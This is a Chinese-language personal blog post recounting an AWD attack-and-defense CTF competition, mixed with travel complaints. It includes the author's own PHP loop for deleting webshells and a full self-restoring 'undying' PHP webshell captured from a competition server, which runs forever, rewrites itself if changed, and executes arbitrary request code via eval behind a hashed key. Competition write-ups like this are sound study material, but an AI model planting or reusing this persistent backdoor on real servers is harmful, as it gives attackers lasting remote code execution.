NEKO

记一次awd

2018/05/27

午饭还不错,主要是还提供西瓜吃,多余的可以跟主办方要,我要了3盆西瓜.

可能是第一次也是最后一次打awd了.

主要是想看下awd什么个流程.

其次还收获了不少好马.

自己也把别人的不死马给删了,虽然不确定奏不奏效,反正目录里是没了.

有2个队在我们第一台服务器中了2个不死马,我在日别人的第三台服务器.(队友竟然没有把第一台服务器的后门删掉,我也是醉了)

FileZilla和Router scan真好用.

自己没什么技术含量,都是靠后门.

还不如直接审计github上的cms,还能弄个cve.

就当是阿宅体验下现充的生活吧.

西安空气质量好差.

同行的人取票时钱包丢了.去找警察,警察不说怎么帮我们,而是表明是我们自己的原因,和他没关系.还好最后被好心人捡到物归原主了.

再也不坐卧铺了,腰疼.

出一趟远门连只猫都没看到.

早上回来,宿舍门被锁了…睡觉害怕的话,被子蒙头就可以了,鬼是不走门的.

我的kali和ubuntu虚拟机占用空间爆表,也不知道是不是实验不死马的原因,按理说不应该.

自己写的删除不死马(不知道管不管用):

1
2
3
4
5
6
7
8
9
10
<?php
ignore_user_abort(true);
set_time_limit(0);

while (1) {
unlink('.709b40b9c75df84b21d7aded7ecd8049.php');
unlink('.ph2thon.php');
usleep(1);
}
?>

想法很简单.但先不管有没有用,如果文件名随机的不死马的话,就没什么用了,但也可以用正则删除.

大佬说可以建个同名文件夹,可以阻止我用的弱智不死马.

大佬说有的不死马可以遍历目录生成,我觉着是个好思路.

大佬的不死马是卢克,我的不死马是哥布林.

到比赛最后我的不死马貌似就几个能用了(:з」∠).

从服务器里套出来个不死马,不知道怎么样,先记下来:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
//fuck
error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(True);
chmod(__FILE__, 0555);
$flag_file = md5(__FILE__);
if (!file_exists($flag_file) || isset($_GET['__force__'])){
@chmod("./", 0755);
file_put_contents($flag_file, '');
chmod($flag_file, 0444);
$base_name = __FILE__;
$base_data = file_get_contents(__FILE__);
while (1) {
if (file_exists($base_name)){
@chmod($base_name, 0555);
$tmp_data = file_get_contents($base_name);
if ($tmp_data != $base_data){
@chmod($base_name, 0755);
file_put_contents($base_name, $base_data);
@chmod($base_name, 0555);
}
}else{
@chmod("./", 0755);
file_put_contents($base_name, $base_data);
chmod($base_name, 0555);
}
}
}

if (isset($_GET['key']) && (md5(md5($_GET['key']) . "xatusec") == "4e1129f84d2ba8379a69b3ee92c8b671")){
@eval($_REQUEST['xatusec.123']);
phpinfo();
}
?>

网络攻防是这样玩的话,那以后就不去了,还是自己没事去审计cms吧(:з」∠).

是运气不好吗,流浪猫都没有.

原文作者: n3k0

发表日期: May 27th 2018, 8:03:34

发出嘶吼: 没有魔夜2玩我要死了

CATALOG